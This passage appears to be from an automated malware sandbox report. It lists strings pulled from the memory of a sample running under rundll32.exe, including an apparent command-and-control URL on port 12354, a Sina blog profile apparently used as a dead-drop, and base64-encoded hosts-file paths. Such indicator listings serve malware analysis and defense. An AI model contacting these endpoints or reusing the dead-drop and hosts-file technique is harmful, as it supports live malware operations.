0000000B.00000003.2302181714.0000000003087000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2229640488.0000000003087000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3547620471.0000000003087000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2706429381.0000000003088000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2266699679.0000000003088000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2804239284.0000000003088000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3400385472.0000000003087000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1972886857.0000000003087000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1874846867.0000000003087000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.241.232:12354/show.phpge
Source: rundll32.exe, 0000000B.00000003.3712679886.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2229640488.00000000030E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2266699679.00000000030E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2023193696.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2407360360.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2279237439.00000000030E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2231428453.00000000030E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1996678440.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2543105125.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2291900665.00000000030E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1650198931.00000000030EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2898743445.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1831828387.00000000030EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2207711905.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2812133556.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3031835504.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2267145364.00000000030E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2461180812.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2120279676.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1705006131.00000000030EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2229921304.00000000030E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.241.232:12354/show.phph
Source: rundll32.exe, 0000000B.00000003.2352322390.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2804453169.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2440193013.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3586874031.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2059813968.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3032265357.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2938955196.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2706492853.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2598064814.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1898521326.0000000005E77000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1746647268.0000000005E77000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2615055327.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2659240427.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1749224254.0000000005E60000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3749057023.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2185790831.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2407411547.0000000005E75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.241.232:12354/show.phpm
Source: rundll32.exe, 0000000B.00000003.1630964432.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1873391879.0000000005E57000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1955205499.0000000005E58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1524675338.0000000005E60000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2994795569.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1898568635.0000000005E57000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1874878565.0000000005E58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3298966343.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1996535082.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1831626210.0000000005E60000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3171831439.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1790546741.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2023510494.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2898885834.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2765318148.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1749224254.0000000005E60000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1658959024.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1709224291.0000000005E58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1524304026.0000000005E57000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3230897223.0000000005E52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.241.232:12354/show.phpm6b
Source: rundll32.exe, 0000000B.00000003.2352322390.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2804453169.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3230859996.0000000005E77000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1996535082.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3586874031.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2737248179.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2543180227.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2294693416.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2302222734.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3415368904.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2938955196.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2706492853.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2598064814.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2659240427.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2020952159.0000000005E78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.241.232:12354/show.phpq
Source: rundll32.exe, 0000000B.00000003.2352322390.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2479584345.0000000005E58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2461344495.0000000005E58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3171831439.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3032265357.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2266852076.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2294693416.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2302222734.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2598064814.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2765318148.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2615055327.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2417807195.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2393534599.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2185790831.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3230897223.0000000005E52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.241.232:12354/show.phpq6~
Source: rundll32.exe, 0000000B.00000003.3399364881.00000000030CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.241.232:12354/show.phpurce
Source: rundll32.exe, 0000000B.00000003.1564311068.0000000005E78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.241.232:12354/show.phpw
Source: rundll32.exe, 0000000B.00000003.2352322390.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2479584345.0000000005E58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2737248179.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2461344495.0000000005E58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3171831439.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2266852076.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2294693416.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2302222734.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3415368904.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2706492853.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2765318148.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2659240427.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2417807195.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2393534599.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2185790831.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3230897223.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3499230558.0000000005E52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.163.241.232:12354/show.phpw6x
Source: rundll32.exe, 0000000B.00000002.3747891418.000000000529D000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://107.163.24I
Source: peks66Iy06.exe, nfxboms.exe.4.dr	String found in binary or memory: http://192.168.100.83/
Source: nfxboms.exe, nfxboms.exe, 0000000A.00000000.1291771540.0000000000401000.00000080.00000001.01000000.00000005.sdmp, nfxboms.exe, 0000000A.00000002.1308503292.0000000000407000.00000040.00000001.01000000.00000005.sdmp, peks66Iy06.exe, nfxboms.exe.4.dr	String found in binary or memory: http://192.168.100.83/9.htm
Source: peks66Iy06.exe, nfxboms.exe.4.dr	String found in binary or memory: http://192.168.100.83/9.htmhttp://192.168.100.83/F.htm%D
Source: peks66Iy06.exe, nfxboms.exe.4.dr	String found in binary or memory: http://192.168.100.83/F.htm
Source: rundll32.exe, rundll32.exe, 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: http://blog.sina.com.cn/u/%s
Source: rundll32.exe, 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: http://blog.sina.com.cn/u/%sXGRyaXZlcnNcZXRjXGhvc3RzLmljcw==XGRyaXZlcnNcZXRjXGhvc3Rz
Source: rundll32.exe, 0000000B.00000003.3152461244.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1954698129.0000000003136000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1746782129.00000000030EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3151484848.0000000003141000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2678805172.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3415252371.0000000003141000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3032057186.0000000003141000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2081652578.0000000003141000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1831578157.0000000003143000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2417807195.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3399975627.0000000003141000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2270808056.00000000030E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1709224291.0000000005E58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1931202109.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1564311068.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3230797464.0000000003141000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2898834326.0000000003141000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2231709490.0000000003141000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2060764124.000000000313D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2752056207.0000000003141000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2023357044.0000000003143000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.cn/u/5655029807
Source: rundll32.exe, 0000000B.00000003.2266699679.00000000030E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2279237439.00000000030E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2498213283.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2267145364.00000000030E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2380844818.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3748685369.0000000005D1D000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2270808056.00000000030E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.cn/u/5655029807.
Source: rundll32.exe, 0000000B.00000003.2598064814.0000000005E53000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.cn/u/5655029807.Shell
Source: rundll32.exe, 0000000B.00000003.3712679886.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2417680832.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3399364881.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1972886857.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1879231380.00000000030EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.cn/u/56550298073
Source: rundll32.exe, 0000000B.00000003.1996535082.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1628908153.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2059813968.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1564311068.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2044371351.0000000005E77000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2185790831.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1658896770.0000000005E77000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2020952159.0000000005E78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.cn/u/56550298075
Source: rundll32.exe, 0000000B.00000003.2266699679.00000000030E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2267145364.00000000030E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2081652578.00000000030CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.cn/u/56550298076
Source: rundll32.exe, 0000000B.00000003.3069466655.00000000030CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.cn/u/56550298078
Source: rundll32.exe, 0000000B.00000003.1930989630.00000000030EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1954698129.00000000030CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.cn/u/5655029807;
Source: rundll32.exe, 0000000B.00000003.3499230558.0000000005E52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.cn/u/5655029807=
Source: rundll32.exe, 0000000B.00000002.3742655429.00000000030CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.cn/u/5655029807=q
Source: rundll32.exe, 0000000B.00000003.2266852076.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2294693416.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2302222734.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3415368904.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3193530668.0000000005E77000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2938955196.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3671902920.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2706492853.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2898885834.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2598064814.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1898521326.0000000005E77000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2765318148.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2615055327.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2659240427.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3732023497.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3152461244.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1931202109.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2044371351.0000000005E77000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2393534599.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3749057023.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2185790831.0000000005E52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.cn/u/5655029807?
Source: rundll32.exe, 0000000B.00000003.1524025579.0000000005E75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1564311068.0000000005E78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.cn/u/5655029807A
Source: rundll32.exe, 0000000B.00000003.2994795569.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2706492853.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3499230558.0000000005E52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.cn/u/5655029807A6
Source: rundll32.exe, 0000000B.00000003.2241271335.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2243458067.00000000030E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.cn/u/5655029807D
Source: rundll32.exe, 0000000B.00000003.1831828387.0000000003088000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1631107673.0000000003087000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1790388775.0000000003088000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3648107822.0000000003087000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2271241972.0000000003087000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2023480935.0000000003087000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3742356390.0000000003088000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2241813750.0000000003087000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2844590947.0000000003088000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2279684923.0000000003087000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2185731267.0000000003088000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2302181714.0000000003087000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2229640488.0000000003087000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3547620471.0000000003087000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2706429381.0000000003088000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2266699679.0000000003088000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2804239284.0000000003088000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3400385472.0000000003087000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1972886857.0000000003087000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1874846867.0000000003087000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.cn/u/5655029807H
Source: rundll32.exe, 0000000B.00000003.1630964432.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1873391879.0000000005E57000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1955205499.0000000005E58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1524675338.0000000005E60000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1898568635.0000000005E57000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1874878565.0000000005E58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1996535082.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1831626210.0000000005E60000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1790546741.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2023510494.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1749224254.0000000005E60000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1658959024.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1709224291.0000000005E58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1524304026.0000000005E57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.cn/u/5655029807K6
Source: rundll32.exe, 0000000B.00000003.3647858321.00000000030CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.cn/u/5655029807M
Source: rundll32.exe, 0000000B.00000003.3415368904.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3499230558.0000000005E52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.cn/u/5655029807Ole
Source: rundll32.exe, 0000000B.00000003.2440193013.0000000005E78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.cn/u/5655029807SOShared
Source: rundll32.exe, 0000000B.00000003.1630964432.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1873391879.0000000005E57000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1955205499.0000000005E58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1524675338.0000000005E60000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1898568635.0000000005E57000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1874878565.0000000005E58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1996535082.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1831626210.0000000005E60000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1790546741.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2023510494.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2615055327.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1749224254.0000000005E60000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1658959024.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2417807195.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1709224291.0000000005E58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2393534599.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1524304026.0000000005E57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.cn/u/5655029807U6
Source: rundll32.exe, 0000000B.00000003.1872794400.0000000005E75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3230859996.0000000005E77000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1996535082.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1831626210.0000000005E60000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3193530668.0000000005E77000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1898521326.0000000005E77000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1931202109.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1874878565.0000000005E78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.sina.com.cn/u/5655029807Y
